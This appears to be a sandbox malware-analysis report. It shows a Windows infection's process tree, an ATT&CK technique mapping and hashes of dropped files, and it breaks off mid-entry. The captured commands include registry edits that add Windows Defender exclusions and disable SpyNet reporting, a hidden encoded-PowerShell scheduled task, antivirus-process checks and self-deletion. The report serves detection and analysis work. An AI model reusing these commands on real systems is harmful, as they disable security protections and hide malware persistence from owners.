- Suspicious use of SetWindowsHookEx
PID:1492

C:\Users\Admin\Pictures\Adobe Films\Y26PeZoHoz5v8PcQ9YkXcXnl.exe
"C:\Users\Admin\Pictures\Adobe Films\Y26PeZoHoz5v8PcQ9YkXcXnl.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4168

C:\Users\Admin\Pictures\Adobe Films\LQjiC6CxycVmKHIsx48t5juW.exe
"C:\Users\Admin\Pictures\Adobe Films\LQjiC6CxycVmKHIsx48t5juW.exe"
3⤵
- Executes dropped EXE
PID:2128

C:\Users\Admin\Pictures\Adobe Films\QsDVuuieOmEhcfjx2u5bd_qJ.exe
"C:\Users\Admin\Pictures\Adobe Films\QsDVuuieOmEhcfjx2u5bd_qJ.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 1324
4⤵
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 1392
4⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 1400
4⤵
PID:5848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 1444
4⤵
PID:6004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "QsDVuuieOmEhcfjx2u5bd_qJ.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\QsDVuuieOmEhcfjx2u5bd_qJ.exe" & exit
4⤵
PID:2764

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "QsDVuuieOmEhcfjx2u5bd_qJ.exe" /f
5⤵
- Kills process with taskkill
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 1552
4⤵
PID:4840

C:\Users\Admin\Pictures\Adobe Films\c1uWn36JMLTOIWNQ5QGAwvr6.exe
"C:\Users\Admin\Pictures\Adobe Films\c1uWn36JMLTOIWNQ5QGAwvr6.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3044

C:\Users\Admin\Pictures\Adobe Films\as4qJia1bHnLCDKj1Zg2H4yX.exe
"C:\Users\Admin\Pictures\Adobe Films\as4qJia1bHnLCDKj1Zg2H4yX.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3104

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4300

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 604
3⤵
- Program crash
PID:2552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 212 -ip 212
1⤵
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3940 -ip 3940
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3940 -ip 3940
1⤵
PID:552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3940 -ip 3940
1⤵
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3940 -ip 3940
1⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3940 -ip 3940
1⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3940 -ip 3940
1⤵
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3940 -ip 3940
1⤵
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3940 -ip 3940
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3940 -ip 3940
1⤵
- Executes dropped EXE
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3940 -ip 3940
1⤵
PID:3884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3940 -ip 3940
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3940 -ip 3940
1⤵
PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3940 -ip 3940
1⤵
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3940 -ip 3940
1⤵
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3940 -ip 3940
1⤵
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3940 -ip 3940
1⤵
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3940 -ip 3940
1⤵
PID:2640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3940 -ip 3940
1⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3940 -ip 3940
1⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3940 -ip 3940
1⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3940 -ip 3940
1⤵
PID:5016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2024 -ip 2024
1⤵
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2024 -ip 2024
1⤵
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2024 -ip 2024
1⤵
PID:1740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2024 -ip 2024
1⤵
PID:1124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2024 -ip 2024
1⤵
PID:640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2024 -ip 2024
1⤵
PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2024 -ip 2024
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2024 -ip 2024
1⤵
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2024 -ip 2024
1⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2024 -ip 2024
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2024 -ip 2024
1⤵
PID:2272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2024 -ip 2024
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2024 -ip 2024
1⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2024 -ip 2024
1⤵
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2024 -ip 2024
1⤵
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2024 -ip 2024
1⤵
PID:3400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1296 -ip 1296
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1296 -ip 1296
1⤵
PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1296 -ip 1296
1⤵
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1296 -ip 1296
1⤵
PID:1276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1296 -ip 1296
1⤵
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1296 -ip 1296
1⤵
PID:2632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1296 -ip 1296
1⤵
PID:1452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1296 -ip 1296
1⤵
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1296 -ip 1296
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1296 -ip 1296
1⤵
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1296 -ip 1296
1⤵
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1296 -ip 1296
1⤵
PID:2004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1296 -ip 1296
1⤵
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1296 -ip 1296
1⤵
PID:2724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 1296 -ip 1296
1⤵
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1296 -ip 1296
1⤵
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1296 -ip 1296
1⤵
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1296 -ip 1296
1⤵
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1296 -ip 1296
1⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1296 -ip 1296
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1296 -ip 1296
1⤵
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1296 -ip 1296
1⤵
PID:564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1296 -ip 1296
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1296 -ip 1296
1⤵
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1296 -ip 1296
1⤵
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3016 -ip 3016
1⤵
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4972 -ip 4972
1⤵
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4768 -ip 4768
1⤵
PID:564

C:\Users\Admin\Pictures\Adobe Films\as4qJia1bHnLCDKj1Zg2H4yX.exe
"C:\Users\Admin\Pictures\Adobe Films\as4qJia1bHnLCDKj1Zg2H4yX.exe"
1⤵
- Executes dropped EXE
PID:3400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:1028

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:3252

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
3⤵
- Enumerates processes with tasklist
PID:4744

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
3⤵
PID:5552

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
PID:5768

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
PID:5664

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
3⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
4⤵
PID:5588

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
3⤵
PID:5324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 460
1⤵
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 460
1⤵
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4136 -ip 4136
1⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4768 -ip 4768
1⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1780 -ip 1780
1⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\7zS23EC.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:888

C:\Users\Admin\AppData\Local\Temp\7zS405D.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4452

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:2724

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:5176

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:1716

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:4216

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:4756

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:3052

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:5232

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gcQMtuEII" /SC once /ST 00:38:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:4492

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gcQMtuEII"
3⤵
PID:5008

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gcQMtuEII"
3⤵
PID:4720

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\LhOGjpF.exe\" j6 /site_id 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4768 -ip 4768
1⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4768 -ip 4768
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4204

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
1⤵
PID:3672

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
2⤵
- Kills process with taskkill
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4972 -ip 4972
1⤵
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4136 -ip 4136
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3016 -ip 3016
1⤵
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1780 -ip 1780
1⤵
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4768 -ip 4768
1⤵
PID:5288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4768 -ip 4768
1⤵
PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4768 -ip 4768
1⤵
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4768 -ip 4768
1⤵
PID:5972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4768 -ip 4768
1⤵
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5308

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5428 -ip 5428
1⤵
PID:4056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4632

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4396

C:\Users\Admin\AppData\Roaming\sfjwvrc
C:\Users\Admin\AppData\Roaming\sfjwvrc
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1296 -ip 1296
1⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1296 -ip 1296
1⤵
PID:5740

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
655a5f0c38dc9dbd7017833b548917bf

SHA1
d5026b4d27c337ea01c44dcba7ccfaa2c749598a

SHA256
91b377df548f2424d3fdfb8dff672b2bd3d4a19ba40f93b17364d72f295b8e1a

SHA512
6f40fd41d763989bd77161bfa5da77121dd7efe99ec13a8c1b322701388ee8d7bbf077b7985a9f56022558ef7e9fbdbccedfd2c2a88a18e8aafae24fb013a5fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
254199404fccfb91d18c929ce584eef7

SHA1
782d4fe5b1f4cd12af5fb6bc7cbd0392d205fe07

SHA256
6348d04d59e1303a3aa2574cb2f9d98d3d91347d4f03444a15962062dccb1fdd

SHA512
a20f98e59f2e5a16191befd7bf8bd52f5789653b9c1c2917c413d5ca5c2cbfbfa7bc2e8126ef433a979f72bbf6a3fa5b43de8a1eaa490692610101df10ea14a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
254199404fccfb91d18c929ce584eef7

SHA1
782d4fe5b1f4cd12af5fb6bc7cbd0392d205fe07

SHA256
6348d04d59e1303a3aa2574cb2f9d98d3d91347d4f03444a15962062dccb1fdd

SHA512
a20f98e59f2e5a16191befd7bf8bd52f5789653b9c1c2917c413d5ca5c2cbfbfa7bc2e8126ef433a979f72bbf6a3fa5b43de8a1eaa490692610101df10ea14a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
165c8d385e0af406deb1089b621c28db

SHA1
3d7b93f834a08a9bc790290a20aaf835aaaf9c5c

SHA256
7dc6c82e185577088f88e349a6d315138cdbed3956cbb6be5af1f9c098642a33

SHA512
0bbc83a67cfb0ca2f4976b04e84ba60d708ffb7f66050da73cd0a0f28cde09dfde9b762ff5ceca35c22f5461576c47e190342470c470c6360bfb4edad8e34e14

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
165c8d385e0af406deb1089b621c28db

SHA1
3d7b93f834a08a9bc790290a20aaf835aaaf9c5c

SHA256
7dc6c82e185577088f88e349a6d315138cdbed3956cbb6be5af1f9c098642a33

SHA512
0bbc83a67cfb0ca2f4976b04e84ba60d708ffb7f66050da73cd0a0f28cde09dfde9b762ff5ceca35c22f5461576c47e190342470c470c6360bfb4edad8e34e14

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
165c8d385e0af406deb1089b621c28db

SHA1
3d7b93f834a08a9bc790290a20aaf835aaaf9c5c

SHA256
7dc6c82e185577088f88e349a6d315138cdbed3956cbb6be5af1f9c098642a33

SHA512
